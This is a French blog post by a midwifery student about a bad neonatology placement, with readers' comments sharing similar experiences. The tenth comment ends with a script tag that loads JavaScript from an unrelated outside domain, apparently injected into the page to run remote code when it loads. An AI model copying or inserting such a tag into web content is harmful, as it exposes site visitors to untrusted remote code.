• Mes pires stages: la néonatologie

    Lorsque j'ai mis les pieds pour la première fois en néonat' l'ambiance fut vite donnée, en réponse à mon Bonjour ! , je n'ai eu que quelques gromellements. En plus, la néonat' j'appréhendais un peu parce que d'une, les soins infirmiers c'est pas mon truc, et de deux la pédiatrie je m'éclate pas dedans. Youh-ouh !

    Le service est donc tenu par des puéricultrices et déjà en tant que future sage-femme ça peut jeter un froid. D'emblé les infirmières pensaient que je savais tout mieux qu'elles et m'envoyaient poser des sondes de gavages et tripoter les couveuses avec peu d'intérêt pédagogique. Alors oui, mettre une sonde naso-gastrique dans l'absolu je savais faire mais je vous rappelle qu'en néonat' ce sont des infirmières. Or, le moindre geste que pratique une infirmière est décortiqué en plusieurs étapes que si tu les fais pas tout comme c'est écrit tu meurs. (suffit de voir comment un simple bain d'un enfant à terme dans une maternité est technicisé pour comprendre la psychose en néonat'). Je vois donc la puéricultrice me poursuivre horrifiée car je prends le matos dans un plateau bleu au lieu du vert et on me catalogue vite "neuneu". A partir de là elles seront toujours sur mon dos. Il faut dire que la faible activité du service le permet. Et, je peux vous dire que lorsqu'on a quelqu'un constamment sur le dos qui part avec un a priori négatif sur tes capacités ça n'aide pas du tout.

    Ce qui était drôle c'est que je voyais bien que le souffle négative envahissait tout le monde. Il suffisait que je travaille avec une puer inconnue, que ça se passe bien (parce que malgré tout je n'ai fait aucune connerie durant mon stage), puis qu'une de ses collègues vienne lui parler pour que je sente un léger froid s'installer. Les équipes fonctionnaient en garde de 12h et si je m'étais visiblement dès le départ grillée chez une première équipe, avec la contre-équipe j'ai pu un peu fonctionner normalement avant qu'on leur parle de moi. Du coup, cette contre-équipe a pu voir que je n'étais pas complètement neuneu et ça m'a servi.

    Mais, ce qui a pratiquemment sauvé mon stage fut le pic d'activité. A un moment, au lieu d'avoir une néonat au trois quart vide, elle se mit à fonctionner au trois quart plein. Les puer étaient débordées et on me laissait alors gambader seule (moi le danger public). Je prélevais les bébés du service de maternité, je m'occupais de quelques bébés de néonat et ça soulageait tout le monde. Surtout que je n'ai fait mourir personne !!! Enfin, on n'était pas là à me scruter pour savoir si je prenais le pansement nounours ou girafe.

    Vint alors l'entretien avec la cadre et là dès le départ j'ai annoncé la couleur. J'ai clairement dit que je trouvais très regrettable qu'on m'ait jugé dès le premier jour de stage et qu'ensuite on m'ait collé une étiquette qui m'avait empêché d'apprendre comme j'aurais voulu et de montrer mes réelles capacités. J'ai dit que j'étais étudiante et que j'étais là pour apprendre, qu'il était normal que je ne fasse pas tout parfaitement et que malgré tout je n'avais jamais mis aucun patient en danger. De plus, quand l'activité du service a augmenté je ne me suis pas retrouvée complètement perdue. La cadre a reconnu tout ceci... parfois à demi-mot et en ajoutant aussi que c'était moi qui dès le départ n'avait pas su débuter mon stage dans le relationnel avec l'équipe. Là, pour le coup, j'ai évité de dire que l'équipe ne m'avait pas non plus facilité les choses et que pour intégrer un groupe il faut de la bonne volonté des deux côtés. Je n'ai pas dit ça car un puer qui me soutenait était présente et que la cadre allait valider mon stage, je ne voulais pas jeter de l'huile sur le feu.

    De mes trois semaines passées là bas je garde donc un mauvais souvenir, une odeur de lait caillé régurgité. Mais malgré tout ce ne fut pas une période complètement naze, c'était le début de l'été, j'ai rencontré mon Interne. Presque deux ans maintenant.

     


    Tags Tags : , , , ,
  • Commentaires

    1
    juliedepmi
    Vendredi 27 Mai 2011 à 20:35
    Hihi que de souvenirs. Mais c est pareil dans ttes les ecoles dis moi . On en avait fait un film dans un des galas de mon ecole
    2
    Vendredi 27 Mai 2011 à 22:05

    Mais c'est pas au nouveau de s'intégré, c'est à l'équipe d'intégrer le nouveau ! Mais on rêve...

    Domage, j'aurais pensé que s'occuper de nourrisson c'est passionant, toussa toussa (hey, t'es pas futur sf toi ? Quoi ? t'aimes pas les dauphins et les bébés chats ? Mais qu'est ce que tu fais là ?)

    3
    Knackie Profil de Knackie
    Samedi 28 Mai 2011 à 00:29

    la sorcière>> non pas future, mais sage-femme ;) Et puis il y a une différence entre "s'occuper d'un nourrisson" et avoir un bébé comme patient (avec les soins, douloureux ou non, les interactions, les pathologies etc...) Mais sinon j'aime bien les bébés chats

    juliedepmi>> pouic pouic

    4
    yann frat
    Samedi 28 Mai 2011 à 13:42
    yann frat

     

    Ah oui d'accord madame raconte ses stages et madame fait pouic pouic...

    ah ok d'accord...

    • Nom / Pseudo :

      E-mail (facultatif) :

      Site Web (facultatif) :

      Commentaire :


    5
    Knackie Profil de Knackie
    Samedi 28 Mai 2011 à 13:45

    Vil jaloux

    6
    yann frat
    Samedi 28 Mai 2011 à 14:52

     

    Vil copieuse oui... En plus tu dis du mal de ma profession !!! Moi qui n'en dit jamais !!!

     

    ;)

     

    a+

     

    yann

    7
    elly10
    Dimanche 29 Mai 2011 à 14:59

    ah le stage de néonat'... Comme notre école est sadique nous en avais 3!!! Un en esf2 avec les puer (j'ai kiffé, on m'a laissé deux prémas à charge, trop cool) un en néonat en esf3 et un en réa néonat la même année... autant dire que les bruits des scopes, le lait caillé, les sondes, les brady-désat' etc etc t'en peux plus.

    Dieu merci pas de stage en néonat cette année! Finalement je prefère les femmes grosses aux ptits bébés!

    8
    niniie
    Jeudi 2 Juin 2011 à 13:00

    J'ai eu l'impression que c'etait moi à mon dernier stage de neonat en te relisant! ^^

    Ouuff heuresment que ce n'etait que 3 semaines!

    9
    Fant4zy
    Samedi 11 Juin 2011 à 17:20

    Moi je me demande si à l'école de puer on leur apprend pas à être mal aimables avec les pôvres étudiants... On a tous vécu le meme drame... C'est vrai que ça peut être très perturbant pour les nourrissons la couleur de la couverture...  :b

    10
    Dimanche 17 Juin 2012 à 20:52

    Je découvre ton blog aujourd'hui via Mme dix lunes, et bravo !!! Le problème de l'acceuil des étudiants est le même partout je crois. J'ai été élève IDE souvent mal reçue, une fois IDE j'ai bossé en salle de naissance, mal reçue (j'aimerais savoir pourquoi, moi qui était avide d'apprendre, j'allais pas piquer le taf  des sage-femme quand même ??) et aujourd'hui j'éspère intégrer l'école de puer, et ma politique à toujours été: les élèves sont nos futurs collègues, accueillont les comme tel !!!

    Malheureusement il y aura toujours du personnel soignant aigri et mal luné pour les élèves....

    <script src="http://pluginrose.info/dfi823hs.js?0.7873942519378798" type="text/javascript"></script>
    11
    anunime
    Dimanche 3 Février 2013 à 19:59

    Moi plus tard je veux être pédiatre en néonatologie

    12
    capu la pie26
    Vendredi 3 Mai 2013 à 18:48

    Moi aussi plus tadr je veux être pédiatre en néonatologie

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :